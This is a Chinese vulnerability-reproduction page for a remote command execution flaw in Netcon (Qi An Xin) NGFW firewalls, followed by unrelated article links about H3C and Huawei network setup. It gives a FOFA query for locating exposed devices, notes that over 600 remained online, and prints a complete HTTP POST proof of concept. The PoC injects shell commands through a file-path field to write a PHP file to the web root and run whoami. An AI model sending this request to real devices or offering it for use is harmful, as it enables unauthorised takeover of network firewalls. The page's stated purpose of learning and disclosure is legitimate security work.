漏洞复现-网康(奇安信)NGFW下一代防火墙远程命令执行

news/2024/12/29 4:14:57/

漏洞描述

网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。

FOFA语法:app="网康科技-下一代防火墙"

 截止到6.23号这fofa资产里还有600+

POC


POST /directdata/direct/router HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 188
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php"]}],"type":"rpc","tid":17}

运行该命令后回显md5值后会删除文件

echo '<?php echo md5(1);unlink(__FILE__);?>' >/var/www/html/testmd5.php

 也可以直接whoami验证

whoami >/var/www/html/whoami.txt

技术文章仅供参考,此文所提供的信息仅用于学习,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!


http://www.ppmy.cn/news/529508.html

相关文章

外部Portal认证系统 对接 华为 H3C 等设备实现 LDAP AD域 网络准入实名认证

外部Portal认证系统 对接 华为 H3C 等设备 实现 LDAP AD域 网络准入实名认证 在企业园区网络中&#xff0c;需要结合LDAP AD域实现企业内部人员Portal实名认证网络安全准入。方案中企业网络设备可以是华为&#xff08;如AC6005、AC6605、三层交换机&#xff09;或者H3C新华三(…

Portal服务器开源无线,OpenPortalServer开源Portal服务 Web认证服务器 支持华为 H3C 锐捷设备...

​ OpenPortalServer开源Portal服务 Web认证服务器 支持华为 H3C 锐捷设备 OpenPortal官方交流群 119688084 该软件是基于华为AC/BAS PORTAL协议的服务端程序,Java编写,开源。 最新源代码下载地址:https://github.com/lishuocool https://git.oschina.net/SoftLeeSon/ --…

GNS3 vm 添加 H3C VSR1000 镜像、导入初始配置

从华三官网下载 VSR1000 最新版镜像 解压文件&#xff0c;使用 VSR1000_H3C-CMW710-R1340P19-X64.qco 在 Linux 中编辑该镜像文件 # 查看是否加载 nbd 模块 sudo lsmod | grep nbd # 加载nbd模块 sudo modprobe nbd max_part16 # 挂载 qemu-nbd -c /dev/nbd0 VSR1000_H3C-C…

h3c交换机重启_h3c交换机清空配置命令

h3c交换机清空配置命令 H3C CAS云计算管理平台融合了华三通信在网络安全领域的积累,通过对IEEE 802.1Qbg(EVB)标准的支持,为虚拟机在安全、可视、可监管的环境下运行奠定了基础。下面是小编收集的h3c交换机清空配置命令,希望大家认真阅读! 一.用户配置: system-view [H3C]su…

h3c虚拟服务器设置方法,h3c 设置虚拟服务器

h3c 设置虚拟服务器 内容精选 换一换 该步骤是虚拟机配置中的最后一个步骤,由于Cloudbase-init机制,在用于镜像制作的虚拟机关机后再开机会生成随机密码,导致该虚拟机无法登录,所以请您再检查一遍虚拟机内的配置流程,确保正确后,再进行该步操作。SID也就是安全标识符(Sec…

h3c模拟器网络初级综合实验

h3c模拟器网络初级综合实验 需求: 1、为了服务器安全&#xff0c;服务器IP和PC不能在同-网段: 2、销售部门PC不能访问财务和技术部门服务器; 3、三个部门的PC之间不能互访: 4、为防止网络病毒&#xff0c;财务部门的PC之间不能互相访问: 5、每个部门的人员都能访问他们自己部…

H3C 基本配置

一、H3C的前世今生: H3C的前身华为3COM公司&#xff0c;是华为与美国3COM公司的合资公司&#xff08;有传言说是当时Cisco起诉华为抄袭它的东西&#xff0c;所以华为找了一家美国挺有实力而且关系不错的公司来给证明没有抄袭&#xff0c;这个公司就是3COM&#xff09;。2006年&…

华为交换机配置syslog发送_华为/H3C Syslog配置

H3C交换机的设置举例 1. 组网需求 将系统的日志信息发送到 linux 日志主机; 日志主机的IP 地址为1.2.0.1/16; 信息级别高于等于 informational 的日志信息将会发送到日志主机上; 日志信息的输出语言为英文,允许输出信息的模块为ARP 和 CMD。 2. 组网图 3. 配置步骤 (1) 设备…